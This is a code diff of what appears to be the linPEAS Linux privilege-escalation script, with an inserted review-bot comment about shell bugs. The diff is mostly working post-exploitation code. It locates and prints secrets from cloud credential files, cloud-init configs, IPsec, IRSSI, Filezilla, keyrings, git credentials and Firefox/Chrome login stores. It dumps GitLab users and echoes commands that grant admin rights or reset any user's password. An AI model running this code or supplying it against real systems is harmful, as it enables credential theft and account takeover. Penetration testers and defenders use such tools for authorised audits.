echo_not_found "AzureRMContext.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "AzureRMContext\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,AzureRMContext\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ]; then echo_not_found ".bluemix"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bluemix$,${SED_RED},"; for ff in $(find "$f" -name "config.json"); do ls -ld "$ff" | sed -${E} "s,config.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; - ##-- SI) IPSEC - printf $Y"[+] "$GREEN"Searching IPSEC files\n"$NC - ipsecconfs=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_TMP\n$FIND_OTP\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'ipsec\.secrets|ipsec\.conf') - printf "%s\n" "$ipsecconfs" | while read f; do - if [ -r "$f" ]; then - echo "Found IPSEC file: $f" - cat "$f" 2>/dev/null | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${C}[1;31m&${C}[0m," - fi - done - echo "" - ##-- SI) IRSSI - printf $Y"[+] "$GREEN"Searching IRSSI files\n"$NC - irssifols=$(echo "$FIND_DIR_VAR\n$FIND_DIR_HOME\n$FIND_DIR_ETC\n$FIND_DIR_OTP\n$FIND_DIR_USR\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E '.irssi') - printf "%s\n" "$irssifols" | while read d; do - if [ -r "$d/config" ]; then - echo "Found IRSSI config file: $d/config" - cat "$d/config" 2>/dev/null | sed -${E} "s,password.*,${C}[1;31m&${C}[0m," - fi - done - echo "" + print_2title "Analizing Cloud-Init Files (limit 70)" + if ! 
[ "`echo \"$PSTORAGE_CLOUD_INIT\" | grep -E \"cloud\.cfg$\"`" ]; then echo_not_found "cloud.cfg"; fi; printf "%s" "$PSTORAGE_CLOUD_INIT" | grep -E "cloud\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,cloud\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | grep -Ev "\W+\#|^#" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${SED_RED},g"; done; echo ""; - ##-- SI) Keyring - printf $Y"[+] "$GREEN"Searching Keyring files\n"$NC - keyringsfilesfolds=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_MNT\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'keyrings|*\.keyring$|*\.keystore$') - printf "%s\n" "$keyringsfilesfolds" | sort | uniq | while read f; do - if [ -f "$f" ]; then - echo "Keyring file: $f" | sed "s,$f,${C}[1;31m&${C}[0m," - elif [ -d "$f" ]; then - echo "Keyring folder: $f" | sed "s,$f,${C}[1;31m&${C}[0m," - ls -lR "$f" 2>/dev/null | sed -${E} "s,keyrings|\.keyring|\.keystore,${C}[1;31m&${C}[0m," - fi - done - echo "" - ##-- SI) Filezilla - printf $Y"[+] "$GREEN"Searching Filezilla sites file\n"$NC - filezillaconfs=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_OPT\n$FIND_DIR_MNT" | grep -E 'filelliza') - printf "%s\n" "$filezillaconfs" | uniq | while read f; do - if [ -d "$f" ]; then - echo "Found Filezilla folder: $f" - if [ -f "$f/sitemanager.xml" ]; then - cat "$f/sitemanager.xml" 2>/dev/null | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${C}[1;31m&${C}[0m," - fi - fi - done - echo "" + print_2title "Analizing CloudFlare Files (limit 70)" + if ! 
[ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E \"\.cloudflared$\"`" ]; then echo_not_found ".cloudflared"; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E "\.cloudflared$" | while read f; do ls -ld "$f" | sed -${E} "s,\.cloudflared$,${SED_RED},"; done; echo ""; + + + print_2title "Analizing Erlang Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ERLANG\" | grep -E \"\.erlang\.cookie$\"`" ]; then echo_not_found ".erlang.cookie"; fi; printf "%s" "$PSTORAGE_ERLANG" | grep -E "\.erlang\.cookie$" | while read f; do ls -ld "$f" | sed -${E} "s,\.erlang\.cookie$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing GMV Auth Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_GMV_AUTH\" | grep -E \"gvm-tools\.conf$\"`" ]; then echo_not_found "gvm-tools.conf"; fi; printf "%s" "$PSTORAGE_GMV_AUTH" | grep -E "gvm-tools\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,gvm-tools\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|password.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing IPSec Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.secrets$\"`" ]; then echo_not_found "ipsec.secrets"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.conf$\"`" ]; then echo_not_found "ipsec.conf"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing IRSSI Files (limit 70)" + if ! 
[ "`echo \"$PSTORAGE_IRSSI\" | grep -E \"\.irssi$\"`" ]; then echo_not_found ".irssi"; fi; printf "%s" "$PSTORAGE_IRSSI" | grep -E "\.irssi$" | while read f; do ls -ld "$f" | sed -${E} "s,\.irssi$,${SED_RED},"; for ff in $(find "$f" -name "config"); do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,password.*,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analizing Keyring Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"keyrings$\"`" ]; then echo_not_found "keyrings"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "keyrings$" | while read f; do ls -ld "$f" | sed -${E} "s,keyrings$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keyring$\"`" ]; then echo_not_found "*.keyring"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keyring$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keyring$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keystore$\"`" ]; then echo_not_found "*.keystore"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keystore$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keystore$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.jks$\"`" ]; then echo_not_found "*.jks"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.jks$" | while read f; do ls -ld "$f" | sed -${E} "s,\.jks$,${SED_RED},"; done; echo ""; + + + print_2title "Analizing Filezilla Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filelliza$\"`" ]; then echo_not_found "filelliza"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filelliza$" | while read f; do ls -ld "$f" | sed -${E} "s,filelliza$,${SED_RED},"; for ff in $(find "$f" -name "sitemanager.xml"); do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla\.xml$\"`" ]; then echo_not_found "filezilla.xml"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla\.xml$,${SED_RED},"; done; echo ""; + + + print_2title "Analizing Backup Manager Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"storage\.php$\"`" ]; then echo_not_found "storage.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "storage\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,storage\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"database\.php$\"`" ]; then echo_not_found "database.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "database\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,database\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; - ##-- SI) BACKUP-MANAGER - printf $Y"[+] "$GREEN"Searching backup-manager files\n"$NC - backupmanager=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_OPT\n$FIND_MNT\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'storage.php|database.php') - printf "%s\n" "$backupmanager" | sort | uniq | while read f; do - if [ -f "$f" ]; then - echo "backup-manager file: $f" | sed "s,$f,${C}[1;31m&${C}[0m," - cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${C}[1;31m&${C}[0m," - fi - done - echo "" ##-- SI) passwd files (splunk) - printf $Y"[+] "$GREEN"Searching uncommon passwd files (splunk)\n"$NC - splunkpwd=$(echo 
"$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -v "/etc/passwd$" | grep -E 'passwd$') + print_2title "Searching uncommon passwd files (splunk)" SPLUNK_BIN="`command -v splunk 2>/dev/null`" - if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${C}[1;31m&${C}[0m,"; fi - printf "%s\n" "$splunkpwd" | sort | uniq | while read f; do - if [ -f "$f" ] && ! [ -x "$f" ]; then - echo "passwd file: $f" | sed "s,$f,${C}[1;31m&${C}[0m," - cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${C}[1;31m&${C}[0m," + if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi + printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do + if [ -f "$f" ] && ! [ -x "$f" ]; then + echo "passwd file: $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," fi done echo "" ##-- SI) Gitlab - printf $Y"[+] "$GREEN"Searching GitLab related files\n"$NC + print_2title "Searching GitLab related files" #Check gitlab-rails if [ "`command -v gitlab-rails`" ]; then echo "gitlab-rails was found. Trying to dump users..." 
- gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${C}[1;31m&${C}[0m," + gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" echo "" 
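Review bot: `print_2title "Searching tmux sessions"$N` carries a stray `$N` glued onto the title argument, presumably left over from the removed `printf ...$N` line; no other `print_2title` call in this hunk has it, so it should read `print_2title "Searching tmux sessions"`. In the CouchDB, Neo4j, .bluemix, IRSSI and Filezilla blocks the inner loops use `for ff in $(find "$f" -name "local.ini"); do`, which word-splits paths containing whitespace and, unlike the `find ... 2>/dev/null` lines being removed, lets permission-denied messages leak into the report; a `find "$f" -name "local.ini" 2>/dev/null | while read -r ff; do ...; done` form avoids both, and the Firefox block in the next hunk has the same shape. The Splunk block's new `grep "'pass'|'password'|'user'|'database'|'host'|\$"` still uses basic regex, where `|` is a literal character, so the alternation never matches; the Backup Manager block just above already uses `grep -E` for the same pattern and this one should too. The GVM section is titled `"Analizing GMV Auth Files (limit 70)"` and reads `$PSTORAGE_GMV_AUTH` while matching `gvm-tools.conf`; the transposed name looks like a typo that presumably also exists where that variable is populated outside this hunk, and the titles throughout use "Analizing" where "Analyzing" is meant.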
@@ -2610,127 +2468,96 @@ if [ "`echo $CHECKS | grep SofI`" ]; then echo "" fi #Check gitlab files - gitlabfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -v "/lib" | grep -E "secrets.yml$|gitlab.yml$|gitlab.rb$") - printf "%s\n" "$gitlabfiles" | sort | uniq | while read f; do + printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do if [ "`echo $f | grep secrets.yml`" ]; then - echo "Found $f" | sed "s,$f,${C}[1;31m&${C}[0m," - cat "$f" 2>/dev/null | grep -v "^$" | grep -v "^#" + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" elif [ "`echo $f | grep gitlab.yml`" ]; then - echo "Found $f" | sed "s,$f,${C}[1;31m&${C}[0m," + echo "Found $f" | sed "s,$f,${SED_RED}," cat "$f" | grep -A 4 "repositories:" elif [ "`echo $f | grep gitlab.rb`" ]; then - echo "Found $f" | sed "s,$f,${C}[1;31m&${C}[0m," - cat "$f" | grep -v "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${C}[1;31m&${C}[0m," + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED}," fi echo "" done echo "" - ##-- SI) PGP/GPG - printf $Y"[+] "$GREEN"Searching PGP/GPG\n"$NC - pgpg=$(echo "$FIND_HOME\n$FIND_PRIVATE\n$FIND_MNT" | grep -E '\.pgp$|\.gpg$|.gnupg') - if [ "$pgpg" ]; then echo "PGP/GPG files found:" ; - printf "%s\n" "$pgpg" | sort | uniq | while read f; do - if [ -f "$f" ]; then - ls -l "$f" - else - ls -ld "$f" - ls -l "$f" 2>/dev/null - fi - done - echo "" - fi - echo "PGP/GPG software:" - command -v gpg 2>/dev/null || echo_not_found "gpg" - gpg --list-keys 2>/dev/null - command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" - netpgpkeys --list-keys 2>/dev/null - command -v netpgp 2>/dev/null || echo_not_found "netpgp" - echo "" + print_2title "Analizing Github Files (limit 70)" + if ! 
[ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then echo_not_found ".github"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do ls -ld "$f" | sed -${E} "s,\.github$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then echo_not_found ".gitconfig"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gitconfig$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ]; then echo_not_found ".git-credentials"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then echo_not_found ".git"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git$,${SED_RED},"; done; echo ""; + + + print_2title "Analizing Svn Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SVN\" | grep -E \"\.svn$\"`" ]; then echo_not_found ".svn"; fi; printf "%s" "$PSTORAGE_SVN" | grep -E "\.svn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.svn$,${SED_RED},"; ls -lRA "$f";done; echo ""; + + + print_2title "Analizing PGP-GPG Files (limit 70)" + ((command -v gpg && gpg --list-keys) || echo_not_found "gpg") 2>/dev/null + ((command -v netpgpkeys && netpgpkeys --list-keys) || echo_not_found "netpgpkeys") 2>/dev/null + (command -v netpgp || echo_not_found "netpgp") 2>/dev/null + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.pgp$\"`" ]; then echo_not_found "*.pgp"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.pgp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pgp$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gpg$\"`" ]; then echo_not_found "*.gpg"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gpg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then echo_not_found "*.gnupg"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gnupg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + + + print_2title "Analizing Cache Vi Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.swp$\"`" ]; then echo_not_found "*.swp"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.swp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.swp$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.viminfo$\"`" ]; then echo_not_found "*.viminfo"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.viminfo$" | while read f; do ls -ld "$f" | sed -${E} "s,\.viminfo$,${SED_RED},"; done; echo ""; - ##-- SI) vi swp files - printf $Y"[+] "$GREEN"Searching vim files\n"$NC - vimfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E "\.swp$|\.viminfo$") - printf "%s\n" "$vimfiles" | sort | uniq | while read f; do - ls -l "$f" 2>/dev/null - done - echo "" ##-- SI) containerd installed - printf $Y"[+] "$GREEN"Checking if containerd(ctr) is available\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation\n"$NC + print_2title "Checking if containerd(ctr) is available" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" containerd=`command -v ctr` if [ "$containerd" ]; then - echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} 
"s,.*,${C}[1;31m&${C}[0m," + echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," ctr image list fi echo "" ##-- SI) runc installed - printf $Y"[+] "$GREEN"Checking if runc is available\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation\n"$NC + print_2title "Checking if runc is available" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" runc=`command -v runc` if [ "$runc" ]; then - echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," fi echo "" #-- SI) Docker - printf $Y"[+] "$GREEN"Searching docker files\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket\n"$NC - dockerfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'docker.socket|docker.sock|Dockerfile|docker-compose.yml') - printf "%s\n" "$dockerfiles" | while read f; do + print_2title "Searching docker files (limit 70)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" + printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do ls -l "$f" 2>/dev/null - if [ -S "$f" ] && [ -w "$f" ]; then - echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + if ! 
[ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then + echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi done echo "" - #-- SI) Firefox files - printf $Y"[+] "$GREEN"Interesting Firefox Files\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/forensics/basic-forensics-esp/browser-artifacts#firefox\n"$NC - firefoxdirs=$(echo "$FIND_DIR_HOME" | grep -E '\.mozilla') - printf "%s\n" "$firefoxdirs" | while read f; do - if [ "$f" ]; then - echo "Found $f" - find "$f" -name "places.sqlite" -o -name "bookmarkbackups" -o -name "formhistory.sqlite" -o -name "handlers.json" -o -name "persdict.dat" -o -name "addons.json" -o -name "cookies.sqlite" -o -name "cache2" -o -name "startupCache" -o -name "favicons.sqlite" -o -name "prefs.js" -o -name "downloads.sqlite" -o -name "thumbnails" -o -name "logins.json" -o -name "key4.db" -o -name "key3.db" 2>/dev/null | sort - fi - done - echo "" - - #-- SI) Chrome files - printf $Y"[+] "$GREEN"Interesting Chrome Files\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/forensics/basic-forensics-esp/browser-artifacts#firefox\n"$NC - chromedirs=$(echo "$FIND_DIR_HOME" | grep -E 'google-chrome') - printf "%s\n" "$chromedirs" | while read f; do - if [ "$f" ]; then - echo "Found $f" - find "$f" -name "History" -o -name "Cookies" -o -name "Cache" -o -name "Bookmarks" -o -name "Web Data" -o -name "Favicons" -o -name "Login Data" -o -name "Current Session" -o -name "Current Tabs" -o -name "Last Session" -o -name "Last Tabs" -o -name "Extensions" -o -name "Thumbnails" 2>/dev/null | sort - fi - done - echo "" + print_2title "Analizing Firefox Files (limit 70)" + if ! 
[ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then echo_not_found ".mozilla"; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "\.mozilla$" | while read f; do ls -ld "$f" | sed -${E} "s,\.mozilla$,${SED_RED},"; for ff in $(find "$f" -name "places.sqlite"); do ls -ld "$ff" | sed -${E} "s,places.sqlite,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "bookmarkbackups"); do ls -ld "$ff" | sed -${E} "s,bookmarkbackups,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "formhistory.sqlite"); do ls -ld "$ff" | sed -${E} "s,formhistory.sqlite,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "handlers.json"); do ls -ld "$ff" | sed -${E} "s,handlers.json,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "persdict.dat"); do ls -ld "$ff" | sed -${E} "s,persdict.dat,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "addons.json"); do ls -ld "$ff" | sed -${E} "s,addons.json,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "cookies.sqlite"); do ls -ld "$ff" | sed -${E} "s,cookies.sqlite,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "cache2"); do ls -ld "$ff" | sed -${E} "s,cache2,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "startupCache"); do ls -ld "$ff" | sed -${E} "s,startupCache,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "favicons.sqlite"); do ls -ld "$ff" | sed -${E} "s,favicons.sqlite,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "prefs.js"); do ls -ld "$ff" | sed -${E} "s,prefs.js,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "downloads.sqlite"); do ls -ld "$ff" | sed -${E} "s,downloads.sqlite,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "thumbnails"); do ls -ld "$ff" | sed -${E} "s,thumbnails,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "logins.json"); do ls -ld "$ff" | sed -${E} "s,logins.json,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "key4.db"); do ls -ld "$ff" | sed -${E} "s,key4.db,${SED_RED},"; done; echo "";for ff in $(find 
"$f" -name "key3.db"); do ls -ld "$ff" | sed -${E} "s,key3.db,${SED_RED},"; done; echo "";done; echo ""; + + + print_2title "Analizing Chrome Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"google-chrome$\"`" ]; then echo_not_found "google-chrome"; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "google-chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,google-chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + + + print_2title "Analizing Autologin Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin$\"`" ]; then echo_not_found "autologin"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin\.conf$\"`" ]; then echo_not_found "autologin.conf"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; - #-- SI) Autologin files - printf $Y"[+] "$GREEN"Autologin Files\n"$NC - autologinfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_MNT" | grep -E 'autologin|autologin.conf') - printf "%s\n" "$autologinfiles" | while read f; do - if [ "$f" ]; then - echo "$f" - ls -l "$f" 2>/dev/null | sed "s,passwd,${C}[1;31m&${C}[0m," - cat "$f" 2>/dev/null | sed "s,passwd,${C}[1;31m&${C}[0m," - echo "" - fi - done - echo "" #-- SI) S/Key athentication - printf $Y"[+] "$GREEN"S/Key authentication\n"$NC + print_2title "S/Key authentication" if [ "`grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep skey`" ]; then printf "System supports$RED S/Key$NC authentication\n" if ! 
